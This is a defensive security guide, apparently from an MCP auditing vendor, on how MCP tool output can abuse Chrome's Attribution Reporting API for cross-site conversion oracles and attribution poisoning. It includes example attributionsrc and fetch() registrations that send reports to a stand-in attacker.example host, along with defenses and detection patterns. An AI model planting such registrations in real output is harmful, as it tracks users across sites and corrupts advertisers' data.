Security Guide
MCP server Attribution Reporting API security — impression injection, conversion report timing oracle, and report manipulation
The Privacy Sandbox Attribution Reporting API (Chrome 115+) allows any origin to register ad impression sources into the browser's attribution engine via the attributionsourcenonce anchor attribute or the Attribution-Reporting-Register-Source response header. MCP server tool output can inject false impression events that pollute legitimate advertisers' attribution data, or register impression sources where the report destination is the attacker's server — receiving event-level reports when the user performs specific actions on other sites.
What the Attribution Reporting API provides
// Attribution Reporting API — Chrome 115+
// No user permission required for registering impression sources
// Method 1: Anchor-based impression registration
// When the user clicks this link, an impression event is registered
<a href="https://advertiser.example/landing"
attributionsrc="https://attacker.example/register-source"
target="_blank">Click me</a>
// Browser fetches /register-source; server responds with:
// Attribution-Reporting-Register-Source: {
// "destination": "https://advertiser.example",
// "source_event_id": "412444888111012",
// "expiry": 604800,
// "source_nonce": "abc123"
// }
// Method 2: JavaScript registration via fetch with Attribution-Reporting header
const response = await fetch('https://attacker.example/register', {
attributionReporting: {
eventSourceEligible: true,
triggerEligible: false
}
});
// Response headers register the impression source
// When user later visits advertiser.example and triggers a conversion:
// Browser automatically sends an event-level report to attacker.example
// Report contains: source_event_id, trigger_data, source_type, scheduled_report_time
Attack scenarios
| Attack | Mechanism | Impact |
|---|---|---|
| Conversion timing oracle | Register impression with destination = legitimate site; attacker receives event-level report when user converts (purchases, signs up) | Attacker learns when user performed action on another site — reveals purchasing behavior, account creation timing |
| Attribution data poisoning | Inject many false impression events for legitimate advertisers' destinations; legitimate conversion reports are diluted by noise | Corrupts advertisers' ROAS measurement; economic attack on competitors' marketing analytics |
| Cross-site click-stream inference | Register impressions with multiple destination sites; conversion reports reveal which sites the user visited after the MCP session | Cross-site navigation tracking across multiple destinations from a single impression-registration event |
| Report-destination enumeration | Register impressions with many destination URLs; observe which ones trigger reports via attacker-controlled report endpoint | Binary oracle for whether user visited a set of URLs after the MCP session |
Conversion report as cross-site navigation oracle. An attacker who registers an impression source with destination: "https://bank.example" will receive an event-level conversion report if the user navigates to bank.example and a conversion trigger fires on that page. This reveals cross-site navigation patterns without any direct access to the destination site. The report arrives at the attacker's server with a scheduled delay (minutes to hours) — but it does arrive, and it reveals a specific cross-site link in the user's navigation.
Permissions-Policy control
The Attribution Reporting API is controllable via Permissions-Policy: attribution-reporting=(). This blocks cross-origin iframes from using the API. MCP client implementors should include this header on all renderer responses. Note that same-origin tool output is not restricted by this header.
Defenses
| Defense | Effectiveness | Notes |
|---|---|---|
| Permissions-Policy: attribution-reporting=() | High for cross-origin iframes | Standard Privacy Sandbox policy control; include on all MCP renderer responses |
| Sandboxed cross-origin iframe | High — null origin cannot register attribution sources | Comprehensive; also blocks other Privacy Sandbox APIs |
| CSP script-src to block inline scripts | Partial — blocks JavaScript-based registration; does not block HTML attribute-based registration | Must also sanitize attributionsrc attributes in generated HTML |
| Static analysis for attributionsrc and attribution-reporting fetch | Detects — grep for attributionsrc and attributionReporting in tool output templates |
SkillAudit performs this check |
Findings SkillAudit reports
attributionsrc pointing to non-legitimate origin — false impression registration that delivers reports to attacker endpoint
fetch() with attributionReporting.eventSourceEligible: true to an external origin — event-level conversion oracle registration
Permissions-Policy: attribution-reporting=() in MCP client response headers — cross-origin iframes can register impression sources
Related guides: Shared Storage API, Topics API, Fenced Frames security.
Get a graded audit. Paste your MCP server's GitHub URL at skillaudit.dev for a report covering Attribution Reporting, all Privacy Sandbox surfaces, and your full browser permission posture in 60 seconds.